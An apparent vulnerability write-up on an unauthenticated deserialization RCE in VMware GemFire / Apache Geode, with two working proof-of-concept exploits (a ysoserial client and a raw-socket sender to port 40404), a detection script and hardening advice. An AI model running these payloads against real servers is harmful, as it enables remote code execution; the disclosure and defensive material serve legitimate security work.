The vendor has added a notice to the official documentation (https://docs.vmware.com/en/VMware-GemFire/10.0/gf/managing-security-hardening-guide.html), which publicly discloses this vulnerability.
This is a deserialization vulnerability I found while hunting in the VMware vROPS product, but it cannot be exploited directly in vROPS, because that product has SSL enabled with mutual authentication, so a client must hold an SSL certificate before anything gets deserialized. What follows is a record of the deserialization RCE when SSL is not enabled.
GemFire performs unauthenticated deserialization of client-supplied data: an attacker who can reach the server port can construct malicious serialized data and execute code on the target machine.
Test target: vmware-gemfire-9.15.2.tar.gz from https://network.tanzu.vmware.com/products/pivotal-gemfire/ or Apache Geode from GitHub.
```
.\gfsh.bat
start locator --name=locator1
start server --name=server1
```
Locator port: 10334; server port: 40404.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/fdb28504-e9eb-8a83-3cbf-af718525fae7.png)
Add ysoserial-all.jar to the project's dependencies.
```java
import org.apache.geode.cache.Region;
import org.apache.geode.cache.client.ClientCache;
import org.apache.geode.cache.client.ClientCacheFactory;
import org.apache.geode.cache.client.ClientRegionShortcut;
import ysoserial.payloads.CommonsBeanutils1;

public class Main {
    public static void main(String[] args) throws Exception {
        // Connect via the locator on 10334; the pool then talks to the cache server on 40404
        ClientCache cache = new ClientCacheFactory().addPoolLocator("127.0.0.1", 10334).set("log-level", "NONE").create();
        Region<Object, Object> region = cache.createClientRegionFactory(ClientRegionShortcut.PROXY).create("example");
        // ysoserial CommonsBeanutils1 gadget chain; the server deserializes it on receipt
        Object object = new CommonsBeanutils1().getObject("notepad");
        region.put(object, object);
        cache.close();
    }
}
```
The malicious object `object` is deserialized by the server when it is sent to port 40404, which executes the notepad command.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/1a051cef-3662-dff4-19f3-647522185fec.png)
Alternatively, send the serialized data directly to port 40404 over a raw socket:
```java
import ysoserial.Serializer;
import ysoserial.payloads.CommonsBeanutils1;
import java.io.DataOutputStream;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.Socket;

public class SocketTest {
    public static void main(String[] args) throws Exception {
        String host = "192.168.1.166";
        Socket client = new Socket(host, 40404);
        OutputStream outputStream = client.getOutputStream();
        // CommunicationMode 0x64=100=ClientToServer
        outputStream.write(0x64);
        // version 255 0 150
        outputStream.write(0xff);
        outputStream.write(0x0);
        outputStream.write(0x96);
        // valRead REPLY_OK
        outputStream.write(0x3b);
        DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
        // timeout
        dataOutputStream.writeInt(10000);
        // DSCODE SERIALIZABLE
        dataOutputStream.write(0x2c);
        Serializable notepad = (Serializable) new CommonsBeanutils1().getObject("touch /tmp/fuck" + System.currentTimeMillis());
        // Serializable notepad = (Serializable) new URLDNS().getObject("http://" + System.currentTimeMillis() +"."+host+ ".cfj4rxv2vtc0000y0xngg83ncqhyyyyyb.oast.fun");
        dataOutputStream.write(Serializer.serialize(notepad));
        dataOutputStream.flush();
        dataOutputStream.close();
        outputStream.flush();
        outputStream.close();
        client.close();
    }
}
```
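From the defender's side, the byte layout the raw-socket example writes (mode, version, reply code, timeout, DSCODE, then the object) is enough to check captured client traffic to port 40404 for a plain Java-serialized handshake object. The following script is an added example, not code from the post; the field offsets are an assumption drawn from the write order above, the sample bytes are constructed, and 0x2d is assumed to be a non-SERIALIZABLE DSCODE.

```python
import struct

# Byte layout taken from the page's raw-socket example; offsets are an assumption
# drawn from the order in which that code writes to the stream.
COMM_MODE_CLIENT_TO_SERVER = 0x64        # CommunicationMode ClientToServer
REPLY_OK = 0x3B                          # handshake reply code the client writes
DSCODE_SERIALIZABLE = 0x2C               # DSCODE: plain java.io.Serializable follows
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"  # java.io.ObjectOutputStream header

def parse_client_prefix(data: bytes) -> dict:
    """Split the first bytes a client sends to the cache server into the fields
    the page's exploit writes: mode, version, reply, timeout, DSCODE, payload."""
    if len(data) < 10:
        raise ValueError("shorter than a client handshake prefix")
    (timeout_ms,) = struct.unpack(">i", data[5:9])  # DataOutputStream.writeInt is big-endian
    return {
        "mode": data[0],
        "version": data[1:4],
        "reply": data[4],
        "timeout_ms": timeout_ms,
        "dscode": data[9],
        "payload": data[10:],
    }

def detect_java_serialized_handshake(data: bytes) -> list:
    """Return the reasons this client prefix should be alerted on (empty = nothing found)."""
    fields = parse_client_prefix(data)
    reasons = []
    if fields["mode"] != COMM_MODE_CLIENT_TO_SERVER or fields["reply"] != REPLY_OK:
        return reasons  # not the client handshake shape the page describes
    if fields["dscode"] == DSCODE_SERIALIZABLE:
        reasons.append("DSCODE 0x2c: server applies plain Java deserialization to the handshake object")
    if fields["payload"].startswith(JAVA_STREAM_MAGIC):
        reasons.append("payload starts with 0xACED0005 (java.io serialization stream)")
    return reasons

# Constructed samples (not real captures). The malicious one mirrors the page's exploit
# prefix; the bytes after the stream magic are a stand-in, not a working gadget chain.
HANDSHAKE_PREFIX = bytes([0x64, 0xFF, 0x00, 0x96, 0x3B]) + struct.pack(">i", 10000)
SAMPLE_MALICIOUS = HANDSHAKE_PREFIX + bytes([0x2C]) + JAVA_STREAM_MAGIC + b"sr\x00\x11java.util.HashMap"
# 0x2D is assumed here to be a non-SERIALIZABLE DSCODE (Geode's DATA_SERIALIZABLE).
SAMPLE_BENIGN = HANDSHAKE_PREFIX + bytes([0x2D]) + b"\x00\x2bClientProxyMembershipID"

if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, detect_java_serialized_handshake(sample) or "no findings")
```

Detection only narrows the window; the actual fix is the server-side hardening the linked guide describes (SSL with mutual authentication), plus Geode's `validate-serializable-objects` / `serializable-object-filter` properties to restrict which classes the server will deserialize.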
My writing is poor, the wording flippant, the content shallow and the technique clumsy. Pointers and corrections from the masters are welcome and much appreciated.